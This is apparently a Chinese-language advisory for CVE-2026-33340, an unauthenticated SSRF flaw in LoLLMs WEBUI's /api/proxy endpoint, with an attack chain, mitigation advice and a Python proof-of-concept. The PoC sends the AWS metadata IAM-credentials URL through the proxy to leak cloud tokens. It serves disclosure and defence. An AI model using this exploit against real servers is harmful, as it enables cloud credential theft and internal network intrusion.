IPBUF安全漏洞报告
English
CVE-2026-33340 CVSS 9.1 严重

CVE-2026-33340 LoLLMs WEBUI SSRF漏洞

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-33340
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
LoLLMs WEBUI

相关标签

SSRFLoLLMs WEBUI未授权访问信息泄露云元数据窃取

漏洞概述

LoLLMs WEBUI 是大型语言和多模态系统的 Web 用户界面。该产品在所有已知版本中存在一个严重的 SSRF 漏洞。未经身份验证的攻击者可以通过 `/api/proxy` 端点强制服务器发起任意的 GET 请求。利用此漏洞,攻击者可以访问内部服务、扫描本地网络,甚至窃取敏感的云元数据(如 AWS/GCP IAM 令牌)。截至目前,尚未发布已知修复补丁版本。

技术细节

该漏洞源于 LoLLMs WEBUI 服务器端未对 `/api/proxy` 接口接收到的 URL 参数进行足够的校验和过滤。在代码实现中(位于 `lollms/server/endpoints/lollms_apps.py`),该接口直接使用用户提供的 URL 发起 GET 请求并将结果返回给客户端,充当了未受限的代理功能。由于该接口未设置身份验证机制(PR:N),攻击者无需登录即可利用此漏洞。攻击原理在于构造恶意的 HTTP POST 请求,向 `/api/proxy` 发送包含内网地址或云元数据服务的 URL(如 `http://169.254.169.254/latest/meta-data/`)。服务器在接收到请求后,会代替攻击者访问目标地址,从而使得攻击者能够利用服务器的网络位置探测内网端口、读取敏感文件或获取云服务商的临时凭证,进而控制云环境资源。

攻击链分析

STEP 1
侦察与发现
攻击者通过端口扫描或资产测绘发现互联网上开放的 LoLLMs WEBUI 服务。
STEP 2
武器化
攻击者构造包含恶意内部 URL(如云元数据服务地址)的 JSON 数据载荷。
STEP 3
交付与利用
攻击者向 `/api/proxy` 端点发送未经身份验证的 POST 请求,将载荷传递给服务器。
STEP 4
执行与回传
服务器解析请求并代为访问内部资源,将获取的敏感信息直接返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable LoLLMs WEBUI instance target_url = "http://target-host:9600/api/proxy" # Malicious payload targeting AWS metadata (common SSRF target) # Attackers can change this to scan internal network ranges like http://192.168.1.1 payload = { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } try: # Send POST request to exploit the SSRF vulnerability response = requests.post(target_url, json=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Leaked data from internal service:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

LoLLMs WEBUI 所有已知版本

防御指南

临时缓解措施
建议立即在防火墙或 WAF 层面阻断对 `/api/proxy` 接口的外部访问。如果业务允许,可暂时禁用该代理功能。修改源代码,增加对目标 URL 的格式校验,明确禁止请求 `127.0.0.1`、`localhost`、`169.254.169.254` 以及 `192.168.x.x`、`10.x.x.x` 等内网 IP 地址段。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表